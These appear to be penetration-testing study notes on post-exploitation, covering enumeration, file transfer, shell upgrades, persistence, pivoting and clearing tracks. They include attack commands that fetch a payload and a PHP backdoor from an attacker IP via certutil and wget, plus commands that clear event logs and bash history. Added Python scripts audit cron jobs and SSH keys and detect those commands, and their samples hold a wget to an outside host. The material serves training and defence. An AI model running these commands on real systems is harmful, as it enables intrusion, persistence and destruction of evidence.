- Basic familiarity with Linux & Windows
- Basic understanding of TCP & UDP protocols
- Basic familiarity with Metasploit and Exploitation
- Perform post exploitation
- Perform Win/Linux local enumeration
- Upgrade shells and elevate privileges
- Establish persistence and dump account hashes
- Pivot to other systems and clear tracks
Post-Exploitation Introduction
Post-Exploitation is the final phase of interaction with a target during a pentest. Using various attacking techniques, the pentester determines the value of the compromised system and keeps control of it for future use, depending on the kind of access obtained and the level of stealth required.
It is what the pentester does after the initial foothold, and the techniques depend on the target characteristics (operating system, infrastructure).
- The techniques must follow the Rules of Engagement agreed upon with the client before the penetration test, based on the company infrastructure and services.
- The necessary permissions are required to conduct post-exploitation techniques such as modifying services or the system configuration, deleting logs and performing privilege escalation.
- Local Enumeration
- Transferring Files
- Upgrading Shells
- Privilege Escalation
- Persistence
- Dumping & Cracking Hashes
- Pivoting
- Clearing Tracks
The post-exploitation process repeats itself after pivoting to another new target.
The following techniques are covered in the
Reference: Checklist - Local Windows Privilege Escalation | HackTricks
Windows local enumeration: what is running on the target system?
- Hostname
- OS Name, Build, Service Pack, Architecture
- Installed updates/Hotfixes
- Current user, privileges & additional user information
- Other users
- Groups
- Members of the built-in administrators group
- IP address & network adapter
- Internal networks and other hosts on the network
- TCP/UDP services + ports
- Routing table
- Windows Firewall state
- Running processes & services
- Scheduled tasks
A process is an instance of a running program.
A service is a process that runs in the background.
The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules, which:
- saves time
- yields additional enumeration & exploitation information
Tools:
Reference: Checklist - Linux Privilege Escalation | HackTricks
Linux local enumeration: what is running on the target system?
- Hostname
- Distribution & release version
- Kernel version & Architecture
- CPU information
- Disk & mounted drives
- Installed packages
- Current user & privileges
- Other users
- Groups
- IP address & network adapter
- Internal networks and other hosts on the network
- TCP/UDP services + ports
- Running services
- Scheduled Cron Jobs
The Local Enumeration process can be automated with the help of scripts and Metasploit Framework modules, which saves a lot of time.
Tools:
Python modules can be useful for setting up a web server that hosts the files required for transfer.
- Check the Python version:
python -V
python3 -V
py -V # on Windows (py launcher; capital V prints the version, lowercase v starts a verbose interpreter)
- SimpleHTTPServer module (Python 2):
# If the Python version returned is 2.X
python -m SimpleHTTPServer <PORT_NUMBER>
- http.server module (Python 3):
# If the Python version is 3.X
python3 -m http.server <PORT>
# On Windows, try
python -m http.server <PORT>
py -3 -m http.server <PORT>
e.g. copy a file into the current directory and start the web server there, so the file can be downloaded onto the target system:
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
# Python 2.7
python -m SimpleHTTPServer 80
# Python 3.7
python3 -m http.server 80
- Files can be downloaded from a browser or using a GET request
- Set up a web server to host the payload.exe file
# Attacker machine
cd /root/Desktop/ # payload.exe must be here
python3 -m http.server 80
- After gaining access to the Windows target system and spawning a command shell session, download the payload file onto the target system using the certutil tool in cmd.
# Windows Target machine
cd C:\Temp
certutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe
- After exploiting the Linux target, transfer the php-backdoor.php file to the target. Two terminal sessions are necessary; use the tmux utility to get more sessions.
- tmux is a terminal multiplexer: a program which runs in a terminal and allows multiple other terminal programs to be run inside it
sudo apt install tmux -y
# Attacker machine
tmux
# ... Exploitation with MSFconsole in Terminal 0 ...
# CTRL+B and then C to open a new terminal session
cd /usr/share/webshells/php/
ip -br -c a # shows the attacker IP, e.g.
192.219.50.2
python3 -m http.server 80
# CTRL+B then 0 (zero) to navigate to the first Terminal session
# Target machine
/bin/bash -i
wget http://192.219.50.2/php-backdoor.php
Interactive shell techniques are covered in an INE vulnerable Lab. The commands are below, assuming the target SAMBA service is already exploited through the exploit/linux/samba/is_known_pipename MSF module.
- After the exploitation (using MSFconsole, netcat, etc.), a non-interactive shell is obtained, since it doesn't provide a prompt. This is a command shell session
- Display the list of shells on the target system
cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/bin/bash -i
/bin/sh -i
Spawn TTY Shells
- Upgrade to a simple bash or sh session (assuming bash is installed on the target system)
/bin/bash -i
/bin/sh -i
SHELL=/bin/bash script -q /dev/null
# Setup environment variables
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=/bin/bash
- From the non-interactive shell session, check the Python version (if present)
python --version
Python 2.7.9
- Spawn a bash session with Python. The specified shell must be listed inside /etc/shells
python -c 'import pty; pty.spawn("/bin/bash")'
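The two places where /etc/shells and /etc/passwd matter in these notes are the "current user / other users" items of the Linux enumeration checklist and the rule just above that a shell handed to pty.spawn() must be a valid login shell. The helper below is an added example written for these notes (it is not code from the original page, INE, or any tool named here): it cross-references the two files, lists the accounts that can actually log in, flags extra UID-0 accounts, and checks a candidate shell against /etc/shells. Both sample files are constructed; on a live system pass the real contents via read_file().

```python
"""Linux local-enumeration helper: who can log in, and which shell is safe to spawn.

Added example for these notes; the two sample files are constructed and the
second UID-0 account ("toor") is planted only to show what enumeration surfaces.
"""
from dataclasses import dataclass
from typing import List

# Constructed sample of /etc/shells (same layout the notes show)
SAMPLE_SHELLS = """# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
"""

# Constructed sample of /etc/passwd: root, two service accounts, two users, extra UID 0
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:1001:1001::/home/backup:/bin/sh
toor:x:0:0:second root:/root:/bin/dash
"""


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_shells(text: str) -> List[str]:
    """Login shells declared in /etc/shells; comments and blank lines are skipped."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def parse_passwd(text: str) -> List[Account]:
    """Parse the seven colon-separated passwd fields; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        accounts.append(Account(name, int(uid), int(gid), home, shell))
    return accounts


def interactive_accounts(passwd_text: str, shells_text: str) -> List[Account]:
    """Accounts whose shell is a valid login shell: the 'other users' worth noting."""
    valid = set(parse_shells(shells_text))
    return [a for a in parse_passwd(passwd_text) if a.shell in valid]


def uid0_accounts(passwd_text: str) -> List[str]:
    """All UID-0 names; more than one means a root-equivalent account was added."""
    return [a.name for a in parse_passwd(passwd_text) if a.uid == 0]


def shell_is_valid(shell: str, shells_text: str) -> bool:
    """True if `shell` is listed in /etc/shells and can be used for pty.spawn(shell)."""
    return shell in parse_shells(shells_text)


def read_file(path: str) -> str:
    """Read a real /etc/passwd or /etc/shells on a live system."""
    with open(path, encoding="utf-8") as fh:
        return fh.read()


if __name__ == "__main__":
    for acct in interactive_accounts(SAMPLE_PASSWD, SAMPLE_SHELLS):
        print(f"{acct.name:10} uid={acct.uid:<5} shell={acct.shell}")
    print("UID-0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    print("/bin/bash valid:", shell_is_valid("/bin/bash", SAMPLE_SHELLS))
```

The same two functions serve the defender: a second UID-0 entry or a service account that suddenly has /bin/bash instead of nologin is exactly what a post-exploitation persistence step leaves behind, so diffing this output against a known-good baseline is a cheap check.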
Fully Interactive TTY
- Background (CTRL+Z) the current remote shell
- Update the local terminal line settings with stty and bring the remote shell back with fg
stty raw -echo && fg
- Reinitialize the terminal with reset
reset
For more information on Full TTY Shells check
- Check that Perl is available on the target
perl -h
- Spawn a bash session with Perl.
perl -e 'exec "/bin/bash";'
Privilege Escalation vulnerabilities can be identified by using various automation scripts and tools, based on the target system configuration.
- PrivescCheck - a PowerShell script to enumerate common Windows configuration issues that can be leveraged for local privilege escalation
# From CMD
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML,XML"
Check
Privesc vulnerabilities can be identified automatically using the LinEnum tool.
- The labs below focus on manual Linux Privilege Escalation techniques instead
- Linux file permissions are important
Check
Windows Persistence
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. - MITRE ATT&CK
- Persistence techniques and methods usually require administrative access and must follow the rules of engagement agreed upon with the customer.
Check the Windows Persistence Labs
Linux Server: the SSH service is typically enabled and an attacker can take advantage of it.
- If password login is disabled and key-based authentication is enabled, the attacker can copy a user's SSH private key and use it for future access.
Linux Cron: Cron is a service that repeatedly runs Cron jobs; these can be used for command execution at a fixed interval and thus ensure persistent access to the target system.
Check the Linux Persistence Labs
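Both Linux persistence mechanisms described above (SSH keys and cron jobs) leave file-level artifacts that are easy to audit, whether you are the defender or the tester checking that nothing was left behind. The script below is an added example for these notes, not code from the original page or from any tool it names. It parses a user crontab and an authorized_keys file and flags jobs that run from /tmp or /dev/shm, reference hidden files, or download content, plus public keys whose blob is not on a known-keys allowlist. All inputs are constructed samples and the key blobs are placeholders, not real keys; shlex is used so that quoted key options such as command="..." stay in one token.

```python
"""Audit of cron jobs and authorized_keys for persistence leftovers.

Added example for these notes. Samples are constructed; KNOWN_KEYS stands in for
whatever allowlist (configuration management, a key inventory) the environment has.
"""
import re
import shlex
from typing import Dict, List, Set, Tuple

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com"}

# Constructed user crontab: two legitimate jobs and three that warrant a look
SAMPLE_CRONTAB = """# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.update.sh
@reboot /dev/shm/svc -d
*/10 * * * * wget -q http://198.51.100.7/x -O /tmp/x
30 1 * * 0 /usr/bin/apt-get update
"""

# Constructed authorized_keys: one known key, one restricted backup key, one unknown key
SAMPLE_AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAlice alice@laptop
command="/usr/bin/rsync --server",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleBackup backup@nas
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExampleUnknown root@unknown-host
"""
KNOWN_KEYS: Set[str] = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleAlice",
                        "AAAAC3NzaC1lZDI1NTE5AAAAIExampleBackup"}


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """(schedule, command) pairs; comments, blank lines and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                  # @reboot, @daily, ...
            schedule, command = line.split(None, 1)
        else:
            parts = line.split(None, 5)           # five time fields, then the command
            if len(parts) < 6:
                continue                          # malformed line, skip
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((schedule, command))
    return entries


CRON_CHECKS = [
    ("runs from /tmp or /dev/shm", re.compile(r"/(tmp|dev/shm)/")),
    ("references a hidden file", re.compile(r"/\.[^/\s]+")),
    ("downloads content with wget/curl", re.compile(r"\b(wget|curl)\b")),
]


def suspicious_cron_entries(entries: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (command, reasons) for every job that trips at least one check."""
    flagged = []
    for _schedule, command in entries:
        reasons = [why for why, rx in CRON_CHECKS if rx.search(command)]
        if reasons:
            flagged.append((command, reasons))
    return flagged


def parse_authorized_keys(text: str) -> List[Dict[str, str]]:
    """Split each key line into options / type / blob / comment."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)                # keeps command="a b" as one token
        options = ""
        if tokens and tokens[0] not in KEY_TYPES:  # leading options field present
            options, tokens = tokens[0], tokens[1:]
        if len(tokens) < 2 or tokens[0] not in KEY_TYPES:
            continue
        keys.append({"options": options, "type": tokens[0], "blob": tokens[1],
                     "comment": " ".join(tokens[2:])})
    return keys


def unknown_keys(text: str, known: Set[str]) -> List[Tuple[str, str]]:
    """(type, comment) of every key whose blob is not on the allowlist."""
    return [(k["type"], k["comment"]) for k in parse_authorized_keys(text)
            if k["blob"] not in known]


if __name__ == "__main__":
    for cmd, why in suspicious_cron_entries(parse_crontab(SAMPLE_CRONTAB)):
        print(f"cron  {cmd!r}: {', '.join(why)}")
    for ktype, comment in unknown_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEYS):
        print(f"ssh   unknown {ktype} key: {comment}")
```

The allowlist comparison is on the key blob, not the comment, because the comment is free text and is the first thing anyone planting a key would make look legitimate. System crontabs (/etc/crontab, /etc/cron.d) carry an extra user field between the schedule and the command, so a sixth-field split is needed for those; the parser above is for per-user crontabs.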
Check the already covered Credential Dumping theory here:
After the dumping process, hashes can be cracked using:
Check the Cracking Hashes Labs here
Pivoting is a post-exploitation technique of using a compromised host, a foothold / plant, to attack other systems on its private internal network.
- Once access to the first target host is gained, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.
Port Forwarding consists of rerouting/redirecting traffic from a particular port of the target system to a specific port on the attacker system.
- The service thus becomes remotely available to the attacker system
Check the Pivoting Lab here
According to the rules of engagement, the pentester may be required to clear any changes that have been made to the target systems as a result of the exploitation and post-exploitation stages.
A good practice is to store all artifacts (payloads, scripts and binaries) in these folders:
- Windows - C:\Temp
- Linux - /tmp
Metasploit Framework generates and stores a lot of artifacts on the target. Some modules provide removal resource scripts.
- Deleting the Windows Event Log can be a good post-exploitation clearing technique.
- Avoid it during a regular Penetration Test, because the data inside the Windows Event Log is important to the customer.
Metasploit e.g.
cd C:\\
mkdir Temp
cd Temp
# Upload exploit into this C:\Temp directory
- Use the Cleanup RC File
# Cleanup Meterpreter RC File:
cat /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.0454/ATTACKDEFENSE_20230429.0454.rc
background
sessions 1
resource /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.1019/ATTACKDEFENSE_20230429.1019.rc
# Clear Windows Event Log from the Meterpreter session
# An attacker could potentially do this
clearev
cd /tmp
# Upload exploit into this /tmp directory
bash history logs the activity and the commands used
- To clear the bash history
history -c
- The ~/.bash_history file content can be deleted too
cat /dev/null > ~/.bash_history
- When using Metasploit Framework exploits, proceed manually to clear artifacts from the /tmp directory or other directories used.
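Every command in the file-transfer section (certutil -urlcache, wget of a hosted file, python -m http.server / SimpleHTTPServer), the pty.spawn shell upgrade, and the two history-clearing commands just above show up verbatim in command-line auditing (auditd execve records, Windows process-creation events, shell audit logging), which is where a defender catches them. The scanner below is an added example for these notes, not code from the original page: it runs a small rule table over constructed audit lines in a flattened "time host user command" format and reports which host shows both a transfer and a track-clearing step. Host names and users are made up; the 192.219.50.2 address is the attacker IP used earlier in the notes.

```python
"""Rule-based detection over command-audit lines for the activity covered in these notes.

Added example; the log format and every line in SAMPLE_LOG are constructed.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Set

# Constructed audit lines: time, host, user, then the full command line
SAMPLE_LOG = """2023-04-29T10:19:01 win-srv01 jsmith certutil -urlcache -f http://192.219.50.2/payload.exe payload.exe
2023-04-29T10:19:05 win-srv01 jsmith notepad.exe C:\\Temp\\notes.txt
2023-04-29T10:20:11 lnx-web01 www-data wget http://192.219.50.2/php-backdoor.php
2023-04-29T10:21:40 lnx-web01 www-data python -c 'import pty; pty.spawn("/bin/bash")'
2023-04-29T10:25:00 lnx-web01 www-data history -c
2023-04-29T10:25:02 lnx-web01 www-data cat /dev/null > ~/.bash_history
2023-04-29T10:30:00 lnx-web01 root /usr/bin/apt-get update
2023-04-29T10:31:00 kali root python3 -m http.server 80
"""

# (rule name, category, pattern); categories feed the transfer+cleanup correlation below
RULES = [
    ("certutil_download", "transfer",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.IGNORECASE)),
    ("http_fetch", "transfer",
     re.compile(r"\b(wget|curl)\b.*\bhttps?://")),
    ("python_http_server", "staging",
     re.compile(r"\bpython\d?\b\s+-m\s+(http\.server|SimpleHTTPServer)\b")),
    ("pty_spawn", "shell-upgrade",
     re.compile(r"pty\.spawn\(")),
    ("history_clear", "cleanup",
     re.compile(r"\bhistory\s+-c\b")),
    ("bash_history_wipe", "cleanup",
     re.compile(r"(>|\brm\b).*\.bash_history\b")),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split 'time host user command...' into fields; None for lines that are too short."""
    parts = line.split(None, 3)
    if len(parts) < 4:
        return None
    return {"time": parts[0], "host": parts[1], "user": parts[2], "cmd": parts[3]}


def scan(text: str) -> List[Dict[str, str]]:
    """One hit per (line, rule) match, in log order."""
    hits = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for name, category, rx in RULES:
            if rx.search(rec["cmd"]):
                hits.append({**rec, "rule": name, "category": category})
    return hits


def hits_per_host(hits: List[Dict[str, str]]) -> Dict[str, int]:
    return dict(Counter(h["host"] for h in hits))


def hosts_with_transfer_and_cleanup(hits: List[Dict[str, str]]) -> List[str]:
    """Hosts where a transfer rule and a cleanup rule both fired: the strongest signal here."""
    seen: Dict[str, Set[str]] = {}
    for h in hits:
        seen.setdefault(h["host"], set()).add(h["category"])
    return sorted(host for host, cats in seen.items()
                  if {"transfer", "cleanup"} <= cats)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['host']:10} {h['user']:9} {h['rule']:20} {h['cmd']}")
    print("hits per host:", hits_per_host(found))
    print("transfer followed by cleanup on:", hosts_with_transfer_and_cleanup(found))
```

Two caveats worth keeping in mind. `history -c` and truncating ~/.bash_history remove the evidence from the history file itself, so the history file is never the data source for this detection; only execve-level or process-creation auditing that was already shipping off-host records the command. On Windows, the Meterpreter `clearev` step has an equivalent hook: clearing the Security log writes event ID 1102 ("The audit log was cleared") as the first entry of the fresh log, so a forwarded 1102 is the signal that the log was wiped even though its earlier contents are gone.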